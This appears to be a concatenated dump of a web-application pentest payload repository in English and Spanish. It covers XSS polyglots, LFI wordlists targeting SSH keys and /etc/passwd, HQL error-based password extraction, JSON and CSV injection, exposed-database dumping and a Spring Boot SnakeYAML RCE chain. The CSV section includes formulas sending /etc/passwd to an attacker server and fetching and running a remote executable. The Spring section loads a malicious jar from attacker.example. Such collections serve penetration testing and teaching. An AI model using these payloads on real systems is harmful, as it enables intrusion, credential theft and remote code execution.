onclick=alert(1)//"><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg"> 5 | javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* 6 | javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a 7 | javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ 8 | javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* 9 | javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* 10 | javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// 11 | javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* 12 | --></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* 13 | /</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* 14 | javascript://--></title></style></textarea></script><svg "//' onclick=alert()// 15 | /</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* -------------------------------------------------------------------------------- /Web Application/LFI and RFI/Intruder/lfirfi_Linux_Payloads.txt: -------------------------------------------------------------------------------- 1 | /etc/passwd 2 | /etc/group 3 | /etc/hosts 4 | /etc/motd 5 | /etc/issue 6 | /etc/bashrc 7 | /etc/apache2/apache2.conf 8 | /etc/apache2/ports.conf 9 | /etc/apache2/sites-available/default 10 | /etc/httpd/conf/httpd.conf 11 | /etc/httpd/conf.d 12 | /etc/httpd/logs/access.log 13 | /etc/httpd/logs/access_log 14 | /etc/httpd/logs/error.log 15 | /etc/httpd/logs/error_log 16 | /etc/init.d/apache2 17 | /etc/mysql/my.cnf 18 | /etc/nginx.conf 19 | /opt/lampp/logs/access_log 20 | /opt/lampp/logs/error_log 21 | 
/opt/lamp/log/access_log 22 | /opt/lamp/logs/error_log 23 | /proc/self/environ 24 | /proc/version 25 | /proc/cmdline 26 | /proc/mounts 27 | /proc/config.gz 28 | /root/.bashrc 29 | /root/.bash_history 30 | /root/.ssh/authorized_keys 31 | /root/.ssh/id_rsa 32 | /root/.ssh/id_rsa.keystore 33 | /root/.ssh/id_rsa.pub 34 | /root/.ssh/known_hosts 35 | /usr/local/apache/htdocs/index.html 36 | /usr/local/apache/conf/httpd.conf 37 | /usr/local/apache/conf/extra/httpd-ssl.conf 38 | /usr/local/apache/logs/error_log 39 | /usr/local/apache/logs/access_log 40 | /usr/local/apache/bin/apachectl 41 | /usr/local/apache2/htdocs/index.html 42 | /usr/local/apache2/conf/httpd.conf 43 | /usr/local/apache2/conf/extra/httpd-ssl.conf 44 | /usr/local/apache2/logs/error_log 45 | /usr/local/apache2/logs/access_log 46 | /usr/local/apache2/bin/apachectl 47 | /usr/local/etc/nginx/nginx.conf 48 | /usr/local/nginx/conf/nginx.conf 49 | /var/apache/logs/access_log 50 | /var/apache/logs/access.log 51 | /var/apache/logs/error_log 52 | /var/apache/logs/error.log 53 | /var/log/apache/access.log 54 | /var/log/apache/access_log 55 | /var/log/apache/error.log 56 | /var/log/apache/error_log 57 | /var/log/httpd/error_log 58 | /var/log/httpd/access_log 59 | /var/log/nginx/access_log 60 | /var/log/nginx/access.log 61 | /var/log/nginx/error_log 62 | /var/log/nginx/error.log -------------------------------------------------------------------------------- /Web Application/XSS Injection/Intruder/0xcela_event_handlers.txt: -------------------------------------------------------------------------------- 1 | FSCommand 2 | onAbort 3 | onActivate 4 | onAfterPrint 5 | onAfterUpdate 6 | onBeforeActivate 7 | onBeforeCopy 8 | onBeforeCut 9 | onBeforeDeactivate 10 | onBeforeEditFocus 11 | onBeforePaste 12 | onBeforePrint 13 | onBeforeUnload 14 | onBeforeUpdate 15 | onBegin 16 | onBlur 17 | onBounce 18 | onCellChange 19 | onChange 20 | onClick 21 | onContextMenu 22 | onControlSelect 23 | onCopy 24 | onCut 25 | onDataAvailable 
26 | onDataSetChanged 27 | onDataSetComplete 28 | onDblClick 29 | onDeactivate 30 | onDrag 31 | onDragDrop 32 | onDragEnd 33 | onDragEnter 34 | onDragLeave 35 | onDragOver 36 | onDragStart 37 | onDrop 38 | onEnd 39 | onError 40 | onErrorUpdate 41 | onFilterChange 42 | onFinish 43 | onFocus 44 | onFocusIn 45 | onFocusOut 46 | onHashChange 47 | onHelp 48 | onInput 49 | onKeyDown 50 | onKeyPress 51 | onKeyUp 52 | onLayoutComplete 53 | onLoad 54 | onLoseCapture 55 | onMediaComplete 56 | onMediaError 57 | onMessage 58 | onMouseDown 59 | onMouseEnter 60 | onMouseLeave 61 | onMouseMove 62 | onMouseOut 63 | onMouseOver 64 | onMouseUp 65 | onMouseWheel 66 | onMove 67 | onMoveEnd 68 | onMoveStart 69 | onOffline 70 | onOnline 71 | onOutOfSync 72 | onPaste 73 | onPause 74 | onPopState 75 | onProgress 76 | onPropertyChange 77 | onReadyStateChange 78 | onRedo 79 | onRepeat 80 | onReset 81 | onResize 82 | onResizeEnd 83 | onResizeStart 84 | onResume 85 | onReverse 86 | onRowDelete 87 | onRowExit 88 | onRowInserted 89 | onRowsEnter 90 | onScroll 91 | onSeek 92 | onSelect 93 | onSelectStart 94 | onSelectionChange 95 | onStart 96 | onStop 97 | onStorage 98 | onSubmit 99 | onSyncRestored 100 | onTimeError 101 | onTrackChange 102 | onURLFlip 103 | onUndo 104 | onUnload 105 | seekSegmentTime -------------------------------------------------------------------------------- /Web Application/SQL Injection/HQL Injection.md: -------------------------------------------------------------------------------- 1 | # Hibernate Query Language Injection 2 | 3 | > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. 
- Wikipedia 4 | ## Summary 5 | 6 | * [HQL Comments](#hql-comments) 7 | * [HQL List Columns](#hql-list-columns) 8 | * [HQL Error Based](#hql-error-based) 9 | * [References](#references) 10 | 11 | ## HQL Comments 12 | 13 | ```sql 14 | HQL does not support comments 15 | ``` 16 | 17 | ## HQL List Columns 18 | 19 | ```sql 20 | from BlogPosts 21 | where title like '%' 22 | and DOESNT_EXIST=1 and ''='%' -- 23 | and published = true 24 | ``` 25 | 26 | Using a nonexistent column raises an exception that leaks several column names. 27 | 28 | ```sql 29 | org.hibernate.exception.SQLGrammarException: Column "DOESNT_EXIST" not found; SQL statement: 30 | select blogposts0_.id as id21_, blogposts0_.author as author21_, blogposts0_.promoCode as promo3_21_, blogposts0_.title as title21_, blogposts0_.published as published21_ from BlogPosts blogposts0_ where blogposts0_.title like '%' or DOESNT_EXIST='%' and blogposts0_.published=1 [42122-159] 31 | ``` 32 | 33 | ## HQL Error Based 34 | 35 | ```sql 36 | from BlogPosts 37 | where title like '%11' 38 | and (select password from User where username='admin')=1 39 | or ''='%' 40 | and published = true 41 | ``` 42 | 43 | Error based on value casting: comparing the subquery's string result with an integer fails, and the database error message echoes the value. 
44 | 45 | ```sql 46 | Data conversion error converting "d41d8cd98f00b204e9800998ecf8427e"; SQL statement: 47 | select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.promotionCode as promotio3_18_, blogposts0_.title as title18_, blogposts0_.visible as visible18_ from BlogPosts blogposts0_ where blogposts0_.title like '%11' and (select user1_.password from User user1_ where user1_.username = 'admin')=1 or ''='%' and blogposts0_.published=1 48 | ``` 49 | 50 | :warning: **HQL does not support UNION queries** 51 | -------------------------------------------------------------------------------- /Web Application/SSL_TLS/README.md: -------------------------------------------------------------------------------- 1 | # Testing for SSL and TLS Vulnerabilities 2 | 3 | ## Summary 4 | - [Tools](#tools) 5 | - [Protocol SSLv3](#protocol-sslv3) 6 | - [POODLE](#poodle) 7 | - [BEAST & CRIME](#beast--crime) 8 | - [LUCKY13](#lucky13) 9 | 10 | 11 | ## Tools 12 | 13 | You can use [testssl](https://github.com/drwetter/testssl.sh) for this purpose. 14 | 15 | ## Protocol SSLv3 16 | 17 | This protocol is obsolete. There are public vulnerabilities that allow an attacker to decrypt the communications between the client and the server. 18 | 19 | You can use the following command for a PoC in your report: 20 | 21 | ``` 22 | OpenSSL> s_client -ssl3 -proxy 127.0.0.1:8080 -connect <server_victim> 23 | ``` 24 | 25 | ## POODLE 26 | 27 | (CVE-2014-3566) Using SSLv3 with CBC encryption makes the server vulnerable to man-in-the-middle attacks that can decrypt message bytes with only 256 attempts per byte (assuming the application can be forced to send the same bytes multiple times). 
28 | 29 | You can use the following command for a PoC in your report: 30 | ``` 31 | OpenSSL> s_client -ssl3 -proxy 127.0.0.1:8080 -connect <server_victim> 32 | ``` 33 | 34 | ## BEAST & CRIME 35 | 36 | (CVE-2011-3389 / CVE-2012-4929): The use of TLSv1.0 with CBC encryption allows an attacker who can force traffic to decrypt communications by sending messages of variable length and observing the size differences of the encrypted messages. 37 | 38 | You can use the following command for a PoC in your report: 39 | ``` 40 | OpenSSL> s_client -tls1 -cipher AES128-SHA -proxy 127.0.0.1:8080 --connect <server_victim> 41 | ``` 42 | 43 | ## LUCKY13 44 | 45 | (CVE-2013-0169): The server supports CBC ciphers, which are vulnerable to padding oracle attacks based on the processing time of the message authentication algorithm (MAC) used. 46 | 47 | You can use the following command for a PoC in your report: 48 | ``` 49 | OpenSSL> s_client -cipher AES128-SHA -proxy 127.0.0.1:8080 --connect <server_victim> 50 | ``` 51 | 52 | 53 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Intruder/tagsXSS.txt: -------------------------------------------------------------------------------- 1 | a 2 | a2 3 | abbr 4 | acronym 5 | address 6 | animate 7 | animatemotion 8 | animatetransform 9 | applet 10 | area 11 | article 12 | aside 13 | audio 14 | audio2 15 | b 16 | base 17 | basefont 18 | bdi 19 | bdo 20 | bgsound 21 | big 22 | blink 23 | blockquote 24 | body 25 | br 26 | button 27 | canvas 28 | caption 29 | center 30 | cite 31 | code 32 | col 33 | colgroup 34 | command 35 | content 36 | custom tags 37 | data 38 | datalist 39 | dd 40 | del 41 | details 42 | dfn 43 | dialog 44 | dir 45 | div 46 | dl 47 | dt 48 | element 49 | em 50 | embed 51 | fieldset 52 | figcaption 53 | figure 54 | font 55 | footer 56 | form 57 | frame 58 | frameset 59 | h1 60 | head 61 | header 62 | hgroup 63 | hr 64 | html 65 | i 66 | iframe 67 | iframe2 
68 | image 69 | image2 70 | image3 71 | img 72 | img2 73 | input 74 | input2 75 | input3 76 | input4 77 | ins 78 | isindex 79 | kbd 80 | keygen 81 | label 82 | legend 83 | li 84 | link 85 | listing 86 | main 87 | map 88 | mark 89 | marquee 90 | menu 91 | menuitem 92 | meta 93 | meter 94 | multicol 95 | nav 96 | nextid 97 | nobr 98 | noembed 99 | noframes 100 | noscript 101 | object 102 | ol 103 | optgroup 104 | option 105 | output 106 | p 107 | param 108 | picture 109 | plaintext 110 | pre 111 | progress 112 | q 113 | rb 114 | rp 115 | rt 116 | rtc 117 | ruby 118 | s 119 | samp 120 | script 121 | section 122 | select 123 | set 124 | shadow 125 | slot 126 | small 127 | source 128 | spacer 129 | span 130 | strike 131 | strong 132 | style 133 | sub 134 | summary 135 | sup 136 | svg 137 | table 138 | tbody 139 | td 140 | template 141 | textarea 142 | tfoot 143 | th 144 | thead 145 | time 146 | title 147 | tr 148 | track 149 | tt 150 | u 151 | ul 152 | var 153 | video 154 | video2 155 | wbr 156 | xmp -------------------------------------------------------------------------------- /Web Application/JSON Injection/README.md: -------------------------------------------------------------------------------- 1 | # JSON Injection 2 | 3 | ## Summary 4 | - [Inyección JSON del lado del Servidor](#inyeccion-json-del-lado-del-servidor) 5 | - [Bypass de Cuenta](#bypass-de-cuenta) 6 | - [Inyección JSON del lado del Cliente](#inyeccion-json-del-lado-del-cliente) 7 | - [XSS JSON](#xss-json) 8 | - [SQLi JSON](#sqli-json) 9 | - [Reference Error Fix](#reference-error-fix) 10 | - [SSTI](#ssti) 11 | 12 | *** 13 | 14 | Se pueden describir dos tipos de problemas de seguridad: 15 | 16 | ## Inyección JSON del lado del Servidor 17 | 18 | La inyección JSON del lado del servidor ocurre cuando el servidor no desinfecta los datos de una fuente que no es de confianza y los escribe directamente en un flujo JSON. 
19 | 20 | ### Bypass de Cuenta 21 | ``` 22 | john%22,%22account%22:%22administrator%22 23 | ``` 24 | 25 | La cadena JSON resultante es: 26 | ``` 27 | { 28 | "account":"user", 29 | "user":"john", 30 | "account":"administrator", 31 | "pass":"password" 32 | } 33 | ``` 34 | 35 | *** 36 | 37 | ## Inyección JSON del lado del Cliente 38 | 39 | La inyección JSON del lado del cliente ocurre cuando los datos de una fuente JSON que no es de confianza no se desinfectan y analizan directamente con la función "eval" de JavaScript . 40 | 41 | ### XSS JSON 42 | 43 | Note los valores `user` y `account`, deberían ser los propios del escenario que está analizando. 44 | ``` 45 | user"});alert(document.cookie);({"account":"user 46 | ``` 47 | ``` 48 | 1\'/[location=`Javas\x63ript:\x63onfirm\x60K\x60`]// 49 | ``` 50 | 51 | ### SQLi JSON 52 | ``` 53 | {"user_id": "5755 and sleep(12)=1", "receiver": "yourmail@mymail"} 54 | ``` 55 | ``` 56 | {"param":"1')))+MySQL_payload--+-"} 57 | ``` 58 | 59 | ### Reference Error Fix 60 | 61 | Úselo para corregir la sintaxis de algunos códigos javascript. 
62 | 63 | Compruebe la pestaña de la consola en las herramientas de desarrollo del navegador (F12) para el error de referencia respectivo (`ReferenceError`) y reemplace `var` y `myFunc` en consecuencia: 64 | ``` 65 | ';alert(1);var myObj=' 66 | ';alert(1);function myFunc(){}' 67 | ``` 68 | 69 | ### SSTI 70 | ``` 71 | ${alert(1)}<svg onload=eval('`//'+URL)> 72 | ``` 73 | -------------------------------------------------------------------------------- /Web Application/XSS Injection/Intruder/attributesXSS.txt: -------------------------------------------------------------------------------- 1 | onactivate 2 | onafterprint 3 | onafterscriptexecute 4 | onanimationcancel 5 | onanimationend 6 | onanimationiteration 7 | onanimationstart 8 | onauxclick 9 | onbeforeactivate 10 | onbeforecopy 11 | onbeforecut 12 | onbeforedeactivate 13 | onbeforepaste 14 | onbeforeprint 15 | onbeforescriptexecute 16 | onbeforeunload 17 | onbegin 18 | onblur 19 | onbounce 20 | oncanplay 21 | oncanplaythrough 22 | onchange 23 | onclick 24 | onclose 25 | oncontextmenu 26 | oncopy 27 | oncuechange 28 | oncut 29 | ondblclick 30 | ondeactivate 31 | ondrag 32 | ondragend 33 | ondragenter 34 | ondragleave 35 | ondragover 36 | ondragstart 37 | ondrop 38 | ondurationchange 39 | onend 40 | onended 41 | onerror 42 | onfinish 43 | onfocus 44 | onfocusin 45 | onfocusout 46 | onfullscreenchange 47 | onhashchange 48 | oninput 49 | oninvalid 50 | onkeydown 51 | onkeypress 52 | onkeyup 53 | onload 54 | onloadeddata 55 | onloadedmetadata 56 | onloadend 57 | onloadstart 58 | onmessage 59 | onmousedown 60 | onmouseenter 61 | onmouseleave 62 | onmousemove 63 | onmouseout 64 | onmouseover 65 | onmouseup 66 | onmousewheel 67 | onmozfullscreenchange 68 | onpagehide 69 | onpageshow 70 | onpaste 71 | onpause 72 | onplay 73 | onplaying 74 | onpointerdown 75 | onpointerenter 76 | onpointerleave 77 | onpointermove 78 | onpointerout 79 | onpointerover 80 | onpointerrawupdate 81 | onpointerup 82 | onpopstate 83 | onprogress 
84 | onreadystatechange 85 | onrepeat 86 | onreset 87 | onresize 88 | onscroll 89 | onsearch 90 | onseeked 91 | onseeking 92 | onselect 93 | onselectionchange 94 | onselectstart 95 | onshow 96 | onstart 97 | onsubmit 98 | ontimeupdate 99 | ontoggle 100 | ontouchend 101 | ontouchmove 102 | ontouchstart 103 | ontransitioncancel 104 | ontransitionend 105 | ontransitionrun 106 | ontransitionstart 107 | onunhandledrejection 108 | onunload 109 | onvolumechange 110 | onwaiting 111 | onwebkitanimationend 112 | onwebkitanimationiteration 113 | onwebkitanimationstart 114 | onwebkittransitionend 115 | onwheel -------------------------------------------------------------------------------- /Web Application/CSV Injection/README.md: -------------------------------------------------------------------------------- 1 | # CSV Injection (Formula Injection) 2 | 3 | Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed. 
4 | 5 | Basic exploit with Dynamic Data Exchange (Linux and Windows) 6 | 7 | ## Pop passwd file (Linux) 8 | ``` 9 | ='file:///etc/passwd'#$passwd.A1 10 | ``` 11 | 12 | ## Pop a reverseShell (Linux) 13 | ``` 14 | =WEBSERVICE(CONCATENATE("http://[ATTACKER_SERVER]:[PORT]/",('file:///etc/passwd'#$passwd.A1))) 15 | ``` 16 | 17 | ## Pop a calc (Windows) 18 | ``` 19 | DDE ("cmd";"/C calc";"!A0")A0 20 | @SUM(1+1)*cmd|' /C calc'!A0 21 | =2+5+cmd|' /C calc'!A0 22 | ``` 23 | 24 | ## Pop a notepad (Windows) 25 | ``` 26 | =cmd|' /C notepad'!'A1' 27 | ``` 28 | 29 | ## Powershell download and execute (Windows) 30 | ``` 31 | =cmd|'/C powershell IEX(wget [ATTACKER_SERVER]/shell.exe)'!A0 32 | ``` 33 | 34 | ## Msf smb delivery with rundll32 (Windows) 35 | ``` 36 | =cmd|'/c rundll32.exe \\[ATTACKER_SERVER]\3\2\1.dll,0'!_xlbgnm.A1 37 | ``` 38 | 39 | ## Prefix obfuscation and command chaining (Windows) 40 | ``` 41 | =AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A 42 | =cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A 43 | +thespanishinquisition(cmd|'/c calc.exe'!A 44 | = cmd|'/c calc.exe'!A 45 | ``` 46 | 47 | ## Using rundll32 instead of cmd (Windows) 48 | ``` 49 | =rundll32|'URL.dll,OpenURL calc.exe'!A 50 | =rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A 51 | 52 | # Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed. (Windows) 53 | = C m D | '/ c c al c . e x e ' ! 
A 54 | ``` 55 | 56 | Technical Details of the above payload: 57 | 58 | - `cmd` is the name the server can respond to whenever a client is trying to access the server 59 | - `/C calc` is the file name, which in our case is calc (i.e. calc.exe) 60 | - `!A0` is the item name that specifies the unit of data a server can respond with when the client requests the data 61 | 62 | Any formula can start with one of the following characters: 63 | 64 | ``` 65 | = 66 | + 67 | - 68 | @ 69 | ``` 70 | -------------------------------------------------------------------------------- /Web Application/Information Disclosure/README.md: -------------------------------------------------------------------------------- 1 | # Information Disclosure 2 | 3 | La divulgación de información, también conocida como fuga de información, es cuando un sitio web revela involuntariamente información confidencial a sus usuarios. 4 | 5 | *** 6 | 7 | ## Summary 8 | 9 | * [Archivos para Rastreadores Web](#archivos-para-rastreadores-web) 10 | * [Herramientas de Burpsuite](#herramientas-de-burpsuite) 11 | * [Source Code Disclosure via Backup Files](#source-code-disclosure-via-backup-files) 12 | * [Métodos HTTP](#métodos-http) 13 | * [Change "Accept" Header](#change-accept-header) 14 | 15 | *** 16 | 17 | ## Archivos para Rastreadores Web 18 | 19 | ``` 20 | /robots.txt 21 | /sitemap.xml 22 | ``` 23 | 24 | *** 25 | 26 | ## Herramientas de Burpsuite 27 | 28 | "Target --> SiteMap --> Engagement Tools" 29 | 30 | *** 31 | 32 | ## Source Code Disclosure via Backup Files 33 | 34 | Cuando un servidor maneja archivos con una extensión en particular ".php", normalmente ejecutará el código, en lugar de simplemente enviarlo al cliente como texto. Sin embargo, en algunas situaciones, puede engañar a un sitio web para que devuelva el contenido del archivo. 
35 | 36 | ``` 37 | /private.php --> 200 OK (no devuelve nada, solo ejecuta) 38 | /private.php~ --> 200 OK (devuelve el fichero, ya que se está llamando al archivo temporal) 39 | ``` 40 | 41 | *** 42 | 43 | ## Métodos HTTP 44 | 45 | ### TRACE 46 | 47 | TRACE: Repite la solicitud entrante. 48 | 49 | Es posible obtener información de encabezados sensibles con el método TRACE. 50 | 51 | ``` 52 | POST /admin --> 401 Unauthorized 53 | TRACE /admin --> 200 OK 54 | ``` 55 | 56 | Esta última request devuelve un header oculto: 57 | 58 | ``` 59 | X-Custom-IP-Authorization: 181.61.60.225 60 | ``` 61 | 62 | Luego, agregar este header a cada solicitud que se envíe como: 63 | 64 | ``` 65 | X-Custom-IP-Authorization: 127.0.0.1 66 | ``` 67 | 68 | Y se accede como usuario Administrator. 69 | 70 | ### Otros Métodos para Generar Errores 71 | 72 | ``` 73 | HEAD (Solicita la lectura del encabezado de una página Web) 74 | OPTIONS (Consulta ciertas opciones) 75 | POST 76 | GET 77 | PUT (Solicita el almacenamiento de una página Web) 78 | HELP 79 | DELETE (Elimina la página Web) 80 | CONNECT (Reservado para uso futuro) 81 | ``` 82 | 83 | *** 84 | 85 | ## Change "Accept" Header 86 | 87 | Find information disclosure vulnerabilities in some web servers by changing the "Accept" header. 
88 | 89 | `Accept: application/json, text/javascript, */*; q=0.01` 90 | 91 | *** 92 | -------------------------------------------------------------------------------- /Web Application/DataBases/README.md: -------------------------------------------------------------------------------- 1 | ## Summary 2 | 3 | * [Firebase](#firebase) 4 | * [Elastic Search DB](#elastic-search-db) 5 | * [Mongo DB](#mongo-db) 6 | * [Couch DB](#couch-db) 7 | * [Cassandra DB](#cassandra-db) 8 | 9 | ## Firebase: 10 | 11 | ### Validar que exista una DB: 12 | 13 | ``` 14 | https://domain-victim.firebaseio.com/ 15 | http://domain-victim.firebaseio.com/ 16 | ``` 17 | 18 | ### Ver la DB: 19 | 20 | ``` 21 | https://domain-victim.firebaseio.com/.json 22 | https://domain-victim.firebaseio.com/.json~ 23 | http://domain-victim.firebaseio.com/.json 24 | ``` 25 | 26 | ## Elastic Search DB: 27 | 28 | Siempre revisar el puerto 9200. 29 | 30 | Por defecto, Elastic Search DB no posee autenticación, lo que lo convierte en un posible vector de ataque. 31 | 32 | ### Shodan Dork 33 | 34 | ``` 35 | port:"9200" elastic (Shodan) 36 | ``` 37 | 38 | ### Buscar todos los Indexes (DBs) que están disponibles vía GET: 39 | 40 | ``` 41 | http://victim:9200/_cat/indices?v 42 | ``` 43 | ``` 44 | http://victim:9200/_stats/?pretty=1 45 | ``` 46 | 47 | ### Para buscar una palabra en concreto: 48 | 49 | ``` 50 | http://victim:9200/_all/_search?q=email 51 | ``` 52 | 53 | Una buena lista de palabras a buscar es: 54 | 55 | ``` 56 | Username 57 | Email 58 | Password 59 | Token 60 | Secret 61 | Key 62 | ``` 63 | 64 | Si quiere buscar en un Index específico, reemplace "_all" por el Index que desee. 
65 | 66 | ### Listar todo el contenido de un Index en concreto vía GET: 67 | 68 | ``` 69 | http://victim:9200/[index_here]/_mapping?pretty=1 70 | ``` 71 | 72 | ### Consultar todos los valores que contiene un nombre de parámetro específico: 73 | 74 | ``` 75 | http://victim:9200/_all/_search?q=_exists:email&pretty=1 76 | ``` 77 | 78 | Esto devolverá documentos que contienen un campo llamado 'email'. 79 | 80 | ## Mongo DB: 81 | 82 | Siempre revisar el puerto 27017. 83 | 84 | Por defecto, MongoDB no posee autenticación, lo que lo convierte en un posible vector de ataque. 85 | 86 | ### Conectar a la instancia de MongoDB con el cliente de Mongo: 87 | 88 | ``` 89 | mongo [vulnerable_ip] 90 | ``` 91 | 92 | Una vez conectado, utilice algún comando y si obtiene la respuesta "Unauthorized" quiere decir que el login está habilitado. 93 | 94 | ``` 95 | db.adminCommand( { listDatabases: 1 } ) 96 | ``` 97 | 98 | <img src="https://user-images.githubusercontent.com/43796175/118989240-7d3e8d00-b947-11eb-8115-62750b41f0c8.jpg"> 99 | 100 | ## Couch DB: 101 | 102 | Ver los puertos: 103 | ``` 104 | port:5985 105 | port:6984 106 | ``` 107 | 108 | ## Cassandra DB: 109 | 110 | Ver los puertos: 111 | ``` 112 | port:9042 113 | port:9160 114 | ``` 115 | -------------------------------------------------------------------------------- /Web Application/Insecure Deserialization/README.md: -------------------------------------------------------------------------------- 1 | # Insecure Deserialization 2 | 3 | La serialización es el proceso de convertir estructuras de datos complejas, como objetos y sus campos, en un formato "más plano" que se puede enviar y recibir como un flujo secuencial de bytes. 4 | 5 | La deserialización es el proceso de restaurar este flujo de bytes a una réplica completamente funcional del objeto original, en el estado exacto en que se serializó. 
6 | 7 | ## Summary 8 | 9 | * [Java deserialization : ysoserial, ...](JAVA.md) 10 | * [PHP (Object injection) : phpggc, ...](PHP.md) 11 | * [Ruby : universal rce gadget, ...](Ruby.md) 12 | * [Python : pickle, ...](Python.md) 13 | 14 | ## References 15 | 16 | * [Github - ysoserial](https://github.com/frohoff/ysoserial) 17 | * [Github - ysoserial.net](https://github.com/pwntester/ysoserial.net) 18 | * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) 19 | * [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) 20 | * [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) 21 | * [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html) 22 | * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) 23 | * [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/) 24 | * [PHP unserialize](http://php.net/manual/en/function.unserialize.php) 25 | * [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains) 26 | * [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) 27 | * [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin 28 | * [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg 29 | * [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel) 30 | * [Java 
deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals 31 | * [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e) 32 | * [.NET Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) by Alvaro Muñoz (@pwntester) & OleksandrMirosh 33 | -------------------------------------------------------------------------------- /Web Application/Spring Boot/README.md: -------------------------------------------------------------------------------- 1 | # Springboot-Actuator 2 | 3 | Actuator endpoints let you monitor and interact with your application. 4 | 5 | Spring Boot includes a number of built-in endpoints and lets you add your own. 6 | 7 | For example, the `/health` endpoint provides basic application health information. 8 | 9 | Some of them contains sensitive info such as: 10 | 11 | - `/trace` - Displays trace information (by default the last 100 HTTP requests with headers). 12 | - `/env` - Displays the current environment properties (from Spring’s ConfigurableEnvironment). 13 | - `/heapdump` - Builds and returns a heap dump from the JVM used by our application. 14 | - `/dump` - Displays a dump of threads (including a stack trace). 15 | - `/logfile` - Outputs the contents of the log file. 16 | - `/mappings` - Shows all of the MVC controller mappings. 17 | 18 | These endpoints are enabled by default in Springboot 1.X. 19 | 20 | Note: Sensitive endpoints will require a username/password when they are accessed over HTTP. 21 | 22 | Since Springboot 2.X only `/health` and `/info` are enabled by default. 23 | 24 | ## Remote Code Execution via `/env` 25 | 26 | Spring puede cargar configuraciones externas en formato YAML. 27 | 28 | La configuración de YAML se analiza con la biblioteca SnakeYAML, que es susceptible a ataques de deserialización. 
29 | 30 | En otras palabras, un atacante puede obtener RCE cargando un archivo de configuración malicioso. 31 | 32 | ### Steps 33 | 34 | 1. Generate a payload of SnakeYAML deserialization gadget. 35 | 36 | - Build malicious jar 37 | 38 | ```bash 39 | git clone https://github.com/artsploit/yaml-payload.git 40 | cd yaml-payload 41 | # Edit the payload before executing the last commands (see below) 42 | javac src/artsploit/AwesomeScriptEngineFactory.java 43 | jar -cvf yaml-payload.jar -C src/ . 44 | ``` 45 | 46 | - Edit src/artsploit/AwesomeScriptEngineFactory.java 47 | 48 | ```java 49 | public AwesomeScriptEngineFactory() { 50 | try { 51 | Runtime.getRuntime().exec("ping rce.poc.attacker.example"); // COMMAND HERE 52 | } catch (IOException e) { 53 | e.printStackTrace(); 54 | } 55 | } 56 | ``` 57 | 58 | - Create a malicious yaml config (yaml-payload.yml) 59 | 60 | ```yaml 61 | !!javax.script.ScriptEngineManager [ 62 | !!java.net.URLClassLoader [[ 63 | !!java.net.URL ["http://attacker.example/yaml-payload.jar"] 64 | ]] 65 | ] 66 | ``` 67 | 68 | 69 | 2. Host the malicious files on your server. 70 | 71 | - yaml-payload.jar 72 | - yaml-payload.yml 73 | 74 | 75 | 3. Change `spring.cloud.bootstrap.location` to your server. 76 | 77 | ``` 78 | POST /env HTTP/1.1 79 | Host: victim.example:8090 80 | Content-Type: application/x-www-form-urlencoded 81 | Content-Length: 59 82 | 83 | spring.cloud.bootstrap.location=http://attacker.example/yaml-payload.yml 84 | ``` 85 | 86 | 4. Reload the configuration. 
